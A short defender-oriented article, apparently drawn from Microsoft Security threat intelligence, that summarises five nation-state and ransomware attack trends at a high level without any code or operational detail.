Cyber security is constantly evolving and, as such, requires regular vigilance.
Microsoft analyzes more than 78 trillion security signals every day to better understand the latest attack vectors and techniques. Compared to last year, we’ve noticed a change in how threat actors act expand and leverage the support of nation states. It’s clear that organizations continue to suffer more attacks than ever and that attack chains are becoming increasingly complex. Dwell times have shortened and tactics, techniques and procedures (TTPs) have evolved to become more agile and evasive in nature.
Based on these insights, here are five attack trends that end-user organizations should monitor regularly.
Become stealthy by avoiding custom tools and malware
Some threat actor groups are prioritizing stealth by leveraging tools and processes that already exist on their victims’ devices. This allows adversaries to slip under the radar and go undetected by obscuring their actions alongside other threat actors using similar methods to launch attacks.
An example of this trend can be seen with Volt Typhoona Chinese state-sponsored actor that made headlines for targeting U.S. critical infrastructure with above-ground living techniques.
Combining cyber and influence operations for greater impact
State actors have also created a new category of tactics that combines cyber operations and influence operations (IO) methods. Known as “cyber-enabled influence operations,” this hybrid combines cyber methods – such as data theft, defacement, distributed denial of service and ransomware – with influence methods – such as data leaks, sockpuppets, victim impersonation, misleading posts on malicious social media and SMS/email communications: to enhance, exaggerate, or compensate for deficiencies in adversaries’ network access or cyberattack capabilities.
For example, Microsoft observed several Iranian actors attempting to use Bulk SMS messaging to enhance the amplification and psychological effects of their cyber influence operations. We are also seeing more cyber-enabled influence operations attempting to impersonate alleged victim organizations or senior figures in those organizations to add credibility to the effects of the cyber attack or compromise.
Create hidden networks by targeting SOHO network edge devices
Particularly relevant to distributed or remote employees is the growing abuse of small office/home office (SOHO) network edge devices. We increasingly see threat actors using targeted SOHO devices, like the router at a local coffee shop, to assemble secret networks. Some adversaries will even use programs to locate vulnerable endpoints around the world and identify starting points for their next attack. This technique complicates attribution, making attacks appear from virtually anywhere.
Rapid adoption of publicly disclosed POCs for initial access and persistence
Microsoft has increasingly observed certain subsets of nation-states adopting publicly disclosed proof-of-concept (POC) code soon after its release to exploit vulnerabilities in Internet-facing applications.
This trend can be seen in threat groups such as Mint Sandstorman Iranian nation-state that quickly weaponized N-day vulnerabilities in common enterprise applications and conducted highly targeted phishing campaigns to quickly and successfully access environments of interest.
Prioritize specialization in the ransomware economy
We observed a continuous movement towards ransomware specialization. Instead of running an end-to-end ransomware operation, threat actors choose to focus on a small range of features and services.
This specialization has a fragmenting effect, spreading components of a ransomware attack across multiple vendors in a complex shadow economy. Organizations can no longer think of ransomware attacks as coming only from a single actor or threat group. They could instead fight the entire ransomware-as-a-service economy. In response, Microsoft Threat Intelligence now tracks ransomware vendors individually, detecting which traffic groups in initial access and which offer other services.
As cyber defenders look for more effective ways to strengthen their security posture, it’s important to reference and learn from trends and significant breaches from years past. By analyzing these incidents and understanding different adversaries’ motivations and favorable TTPs, we can better prevent similar breaches from occurring in the future.
– To know more Partner perspectives from Microsoft Security